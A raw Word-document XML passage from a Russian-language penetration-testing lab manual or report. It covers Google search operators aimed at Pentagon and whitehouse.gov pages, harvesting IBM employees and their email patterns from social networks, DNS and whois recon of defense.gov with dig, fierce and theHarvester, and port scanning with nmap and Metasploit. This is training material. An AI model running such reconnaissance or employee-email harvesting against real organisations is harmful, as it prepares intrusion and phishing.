        </w:rPr>
        <w:t xml:space="preserve"> в имени которых присутствует слово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hydra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при помощи команды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find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> / -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>name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hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>*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D54811A" wp14:editId="2DE9BCE1">
            <wp:extent cx="5940115" cy="3822700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26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1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc107507603"/>
      <w:bookmarkStart w:id="5" w:name="_Toc107513722"/>
      <w:bookmarkStart w:id="6" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Раздел 2. Интернет-разведка</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/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color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc107507604"/>
      <w:bookmarkStart w:id="8" w:name="_Toc107513723"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Лабораторная работа № 2.1. Применение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в проектах по тестированию защищенности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/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пользоваться операторами поисковых машин.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Задание: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с помощью социальных сетей (xing.com) найти людей, работающих в компании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IBM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;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определить правила формирования почтовых учетных записей для сотрудников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IBM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;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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">применяя следующие операторы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, найти</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> требуемую информацию: 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“” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:” — найти все страницы, содержащие фразу “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>top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secret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” и размещенные на сайте Пентагона. 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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>inurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:” — найти страницы авторизации на сайте whitehouse.gov;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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>filetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">:” — найти все файлы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>docx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files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на сайтах в зоне .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, содержащие фразу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top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secret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; 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найти документацию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> о применении операторов поиска; определить </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>какие</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL скрыты от поисковиков в файлах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robots.txt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на указанных преподавателем сайтах; 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изучить содержимое </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Google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Hacking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Database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;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проверить наличие своего логина пользователя на различных Интернет-ресурсах (</w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidRPr="00EF49CB">
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://namechk.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);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определить, как выглядел сайт defense.gov пять лет назад (waybackmachine.org).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rPr>
          <w:b/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lastRenderedPageBreak/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Найти сотрудников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IBM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, используя социальные сети.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7AFFD5EE" wp14:editId="43BF15A1">
            <wp:extent cx="4432300" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="372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 rotWithShape="1">
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="18526"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4434551" cy="339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2. Определить e-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> адреса сотрудников, найденных в шаге 1.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14AD993B" wp14:editId="62DC3ACF">
            <wp:extent cx="5343144" cy="3782226"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="371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144" cy="3782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3. Найти страницы, содержащие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top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secret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, размещенные на сайте Пентагона.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35C8F0E4" wp14:editId="78CE1E8F">
            <wp:extent cx="5846691" cy="3746500"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
            <wp:docPr id="377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 rotWithShape="1">
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="19837"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852748" cy="375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4. Найти страницы авторизации на сайте whitehouse.gov.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E11CC9" w:rsidRDefault="00EF49CB" w:rsidP="00347A12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418888F0" wp14:editId="2DFA4551">
            <wp:extent cx="5934075" cy="2886075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="373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11CC9"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5. Найти документы на сайтах в зоне .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, содержащие фразу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top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secret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6B5D4EFE" wp14:editId="75AC5756">
            <wp:extent cx="6130243" cy="4762500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="376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0243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6. Просмотреть содержимое файла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robots.txt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на сайте whitehouse.gov.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E11CC9" w:rsidRDefault="00EF49CB" w:rsidP="00347A12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61FB86DF" wp14:editId="09720AE8">
            <wp:extent cx="5934075" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="378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E11CC9"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7. Посмотреть прошлую версию сайта Defense.gov.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00347A12">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2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6FF561F" wp14:editId="7C97C5CA">
            <wp:extent cx="5940115" cy="2921000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc107507605"/>
      <w:bookmarkStart w:id="10" w:name="_Toc107513724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2.2. Техническая разведка ИТ-инфраструктуры</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10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собирать информацию об ИТ-инфраструктуре.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Задание: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используя онлайн сервис для построения сетевых маршрутов, построить маршрут до узла, указанного преподавателем;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с помощью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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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определить </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>какие</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS и почтовые серверы используются для домена, указанного преподавателем;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определить IP-адрес сайта, данного преподавателем;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с помощью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whois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определить диапазон сети, в который входит IP-адрес сайта, указанного преподавателем; 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провести </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>брутфорс</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS с помощью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fierce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для домена, указанного преподавателем; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB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запустить утилиту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theharvester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для домена, указанного преподавателем.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11CC9" w:rsidP="00E11CC9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 xml:space="preserve">Шаг 1. </w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Построение маршрутов на сайте</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E11CC9" w:rsidRDefault="00EF49CB" w:rsidP="00E11CC9">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/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61A7324F" wp14:editId="6641F56F">
            <wp:extent cx="4331084" cy="1515534"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="382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7076" cy="1514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11CC9" w:rsidRDefault="00E11CC9" w:rsidP="00E11CC9">
      <w:pPr>
        <w:pStyle w:val="aff1"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00355377">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:b w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w14:textFill>
              <w14:solidFill>
                <w14:srgbClr w14:val="0000FF">
                  <w14:lumMod w14:val="95000"/>
                  <w14:lumOff w14:val="5000"/>
                </w14:srgbClr>
              </w14:solidFill>
            </w14:textFill>
          </w:rPr>
          <w:t>https://www.monitis.com/traceroute</w:t>
        </w:r>
      </w:hyperlink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0B71A361" wp14:editId="219583FA">
            <wp:extent cx="4578572" cy="2209736"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="384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5590" cy="2213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11CC9" w:rsidP="00EF49C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lastRenderedPageBreak/>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Применить утилиту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="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dig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 xml:space="preserve"> для defense.gov (для выполнения команды потребуется доступ в Интернет).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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FF4C916" wp14:editId="6CD344D4">
            <wp:extent cx="5940115" cy="2578100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="359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11CC9" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="720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 xml:space="preserve">Шаг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Найти почтовые серверы, используемые доменом defense.gov.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004722E" wp14:editId="459CF73F">
            <wp:extent cx="5940115" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="365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1CC9" w:rsidRDefault="00E11CC9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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00E11CC9" w:rsidP="00EF49C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Шаг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Найти DNS-серверы, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>используемые</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> доменом defense.gov.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1C60FFE" wp14:editId="16605E64">
            <wp:extent cx="5570220" cy="3286928"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="341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4100" cy="3289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4. Определить IP-адрес сайта defense.gov и найти диапазон IP-адресов.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04B0AF4" wp14:editId="19F00810">
            <wp:extent cx="5940115" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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90FC0E6" wp14:editId="2C68160A">
            <wp:extent cx="4170228" cy="3549886"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="24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31"/>
                    <a:srcRect b="18170"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4172433" cy="355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5. Провести </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>брут</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-форс DNS.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086E725" wp14:editId="325E4E09">
            <wp:extent cx="4090253" cy="3863340"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
            <wp:docPr id="380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 rotWithShape="1">
                    <a:blip r:embed="rId32"/>
                    <a:srcRect r="11159" b="17021"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4091363" cy="386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6. Использовать утилиту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theHarvester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4B5628">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/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CFE9BAC" wp14:editId="1EA6DEB1">
            <wp:extent cx="5469590" cy="4488722"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="25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563" cy="448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1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc107507606"/>
      <w:bookmarkStart w:id="12" w:name="_Toc107513725"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Раздел 3. Поиск уязвимостей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/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color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc107507607"/>
      <w:bookmarkStart w:id="14" w:name="_Toc107513726"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лабораторная работа № 3.1. Сканирование портов и поиск уязвимостей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24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 w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>изучение сканирования портов.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Задание: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:left="1134" w:hanging="425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1. Провести сканирование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 с помощью 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веб-интерфейса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Сканер-ВС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(раздел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Поиск целей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);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Zenmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (определить открытые порты);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NMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (определить открытые порты, версии работающих сервисов и версию операционной системы);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418" w:hanging="425"/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db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework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F49CB">
      <w:pPr>
        <w:ind w:left="1134" w:hanging="425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2. Провести экспорт результатов сканирования из базы данных </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и открыть их в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
